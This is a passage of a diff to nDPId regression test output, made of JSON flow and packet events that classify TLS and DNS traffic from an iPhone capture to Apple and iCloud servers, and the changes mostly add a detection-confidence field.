-03119{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+03145{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01218{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01244{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCUOgAAP8R5V\/AqAIRwKgCAfrLADUALpJfu2MBAAABAAAAAAAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAE="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
